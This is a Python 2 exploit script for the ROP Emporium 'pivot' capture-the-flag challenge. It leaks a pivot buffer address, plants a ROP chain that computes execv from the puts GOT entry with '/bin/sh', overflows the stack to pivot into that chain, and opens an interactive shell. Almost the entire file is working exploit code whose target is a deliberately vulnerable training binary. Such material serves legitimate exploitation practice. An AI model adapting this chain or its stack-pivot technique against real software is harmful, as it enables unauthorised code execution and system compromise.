Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
'''
Solution for ROP Emporium pivot's challenge (https://ropemporium.com/challenge/pivot.html)
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)
'''
import socket
from struct import pack
import telnetlib
def p64(x):
    """Pack *x* as a little-endian signed 64-bit integer (struct format ``<q``)."""
    little_endian_qword = '<q'
    return pack(little_endian_qword, x)
# --- connection ------------------------------------------------------------
# Python 2 script (print statements; str and the output of pack() are
# concatenated directly).  The peer is the challenge binary served locally
# on port 4444, as described in the module docstring.
s = socket.socket(
    socket.AF_INET, socket.SOCK_STREAM)
s.connect(("127.0.0.1", 4444))
data = s.recv(1000)
print "[+] Connected!"
# Accumulate output until the binary's "to pivot: " banner has arrived
# (str.find(data, sub) is just data.find(sub)).
# NOTE(review): recv() returns "" once the peer closes the connection, so
# this loop never terminates if the marker never shows up -- left as is.
while str.find(data, "to pivot: ") == -1:
    data += s.recv(1000)
# The 14 characters after the marker are the address the binary prints
# (presumably "0x" followed by 12 hex digits); parse them as base 16.
pivot = str.find(data, "to pivot: ")
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14]
print "[+] Got Pivot: ", pivot
pivot = int(pivot, 16)
# --- first payload: the chain stored in the pivot buffer --------------------
# Layout, per the author's gadget comments below: 8 bytes of command string,
# 24 bytes consumed by the three pops that follow "pop rsp" in the second
# payload, then the chain itself.  Gadget addresses and the libc offset are
# hard-coded for the author's copy of the binary and libc; nothing here is
# derived at runtime except the leaked pivot address.
command = '/bin/sh\x00'
rop = command
rop += 'C'*8*3 # r13, r14, r15
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got
rop += p64(0x602020) # puts@got
rop += p64(0x400900) # pop rbp; ret;
rop += p64(0x5D1D0) # execv-puts offset
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address)
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL)
rop += p64(pivot) # rdi
rop += p64(0x400b71) # pop rsi; pop r15; ret;
rop += p64(0x0) # rsi
rop += p64(0x0) # r15
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX)
rop += '\n'
s.send(rop)
# Drain the binary's reply before the next prompt; the content is not inspected.
data += s.recv(1000)
print "[+] Pivot ROP sent.."
# --- second payload: the stack overflow that moves rsp into the pivot buffer -
# 40 bytes of filler (the distance to the saved return address in the author's
# layout), then a gadget that loads rsp with pivot+len(command), i.e. just past
# "/bin/sh\x00".  Once rsp has moved, the gadget's remaining pops read from the
# pivot buffer, so the trailing 8 bytes below are never consumed.
rop = 'A'*40
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot)
rop += p64(pivot+len(command))
rop += 'B'*8
rop += '\n'
# NOTE: this message is printed before the send that follows it.
print "[+] Overflow ROP sent.."
s.send(rop)
data += s.recv(1000)
print "[+] Shell popped!"
# Reuse the connected socket as a Telnet session and relay stdin/stdout to it
# (Telnet.interact).  telnetlib was removed from the standard library in
# Python 3.13; this script targets Python 2.
t = telnetlib.Telnet()
t.sock = s
t.interact()
#s.close()